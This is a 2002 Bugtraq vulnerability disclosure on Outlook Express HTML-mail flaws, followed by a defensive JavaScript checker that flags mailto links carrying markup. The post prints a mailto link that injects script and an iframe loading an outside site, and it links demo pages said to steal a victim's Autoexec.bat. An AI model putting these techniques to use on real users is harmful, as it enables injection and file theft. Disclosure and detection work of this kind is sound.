[25056] in bugtraq
More fun with html mail: Outlook Express, Internet Explorer, Other etc
daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Mon Apr 15 12:38:42 2002
Message-Id: <200204142159.g3ELxD1v085757@mail2.megamailservers.com>
Date: Sun, 14 Apr 2002 21:59:13 -0000
To: <bugtraq@securityfocus.com>, <NTBugtraq@listserv.ntbugtraq.com>
From: "http-equiv@excite.com" <http-equiv@malware.com>
Cc: <vuln-dev@securityfocus.com>
Reply-To: http-equiv@malware.com
Sunday, April 14, 2002
1. Not Possible
Technically it cannot be possible to create an HTML mail message from
a mailto URL scheme without user input. However, shoe-horning HTML in
through insertion of script tags does make it possible. The default
installation of Outlook Express, and probably Outlook, is 'mail
sending format: html':
<a href="mailto: freak@bloatedcorp.com
?cc=contest@bloatedcorp.com
&subject=Million Dollar Contest
&body=<script></script>
<iframe src=http://www.malware.com'>">
contest@bloatedcorp.com </a>
This is not a good idea.
Working Example:
http://www.malware.com/$illine$$.html
Note: this is an 8-month-old 'thing':
http://www.securityfocus.com/bid/3334
2. EVEN WORSE:
Trivial file theft using Outlook Express, maybe Outlook. Instead of
delivering files to the target computer, we rather take files from
the target computer. With a bit of Idiot Engineering, we reverse the
process as detailed here: http://www.securityfocus.com/bid/1221 and
here: http://www.kb.cert.org/vuls/id/31994.
Note: now almost 24 months old.
Working Example:
This will pluck and send your Autoexec.bat from a default Windows
installation. Targeted computers with specific files can prove more
lucrative.
http://www.malware.com/idiot$.html
Notes:
1. Outlook Express 6 default mail is in the 'restricted zone'.
Outlook Express 5.5 isn't. Disable ActiveX and all those other
things.
2. Do not send 'unknown' webmasters entire web pages despite how
tempting the request is.
3. Scraping the bottom of the barrel.
End Call.
--
http://www.malware.com
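
A defender-side check for the mailto construction in item 1, as an added example that is not part of the original post: it parses a mailto: href, percent-decodes each header field, flags any field carrying tag-like markup, and rebuilds the link without it. Function names and the sample links (example.com, example.invalid) are constructed for illustration.

```javascript
// Added example, not from the original post. Names and sample links are
// constructed. Flags mailto: links whose header fields carry HTML markup.
const TAG = /<\s*[a-z!\/]/i; // start of something tag-like: <script, </a, <!--

function safeDecode(s) {
  // Malformed percent-escapes must not crash the audit; fall back to raw text.
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

function parseMailto(href) {
  const m = /^\s*mailto:/i.exec(href);
  if (!m) return null;
  const rest = href.slice(m[0].length);
  const q = rest.indexOf("?");
  const to = safeDecode(q < 0 ? rest : rest.slice(0, q)).trim();
  const fields = [];
  for (const pair of (q < 0 ? "" : rest.slice(q + 1)).split("&")) {
    if (!pair.trim()) continue;
    const eq = pair.indexOf("="); // split on the first '=' only
    const name = safeDecode(eq < 0 ? pair : pair.slice(0, eq)).trim().toLowerCase();
    fields.push({ name, value: safeDecode(eq < 0 ? "" : pair.slice(eq + 1)) });
  }
  return { to, fields };
}

function auditMailto(href) {
  const parsed = parseMailto(href);
  if (!parsed) return { mailto: false, findings: [] };
  const findings = parsed.fields.filter(f => TAG.test(f.value)).map(f => f.name);
  return { mailto: true, to: parsed.to, findings };
}

// Rebuild the link without the flagged fields, percent-encoding what remains.
function sanitizeMailto(href) {
  const parsed = parseMailto(href);
  if (!parsed) return null;
  const addr = encodeURIComponent(parsed.to).replace(/%40/g, "@").replace(/%2C/gi, ",");
  const kept = parsed.fields
    .filter(f => !TAG.test(f.value))
    .map(f => encodeURIComponent(f.name) + "=" + encodeURIComponent(f.value));
  return "mailto:" + addr + (kept.length ? "?" + kept.join("&") : "");
}

// Constructed sample shaped like the link in item 1.
const SAMPLE = "mailto: freak@example.com?cc=contest@example.com" +
  "&subject=Million Dollar Contest" +
  "&body=<script></script><iframe src=http://example.invalid/>";
console.log(auditMailto(SAMPLE).findings, sanitizeMailto(SAMPLE));
```

The check runs on the href after HTML attribute decoding, so entity-encoded markup in the page source has to be decoded by the caller first.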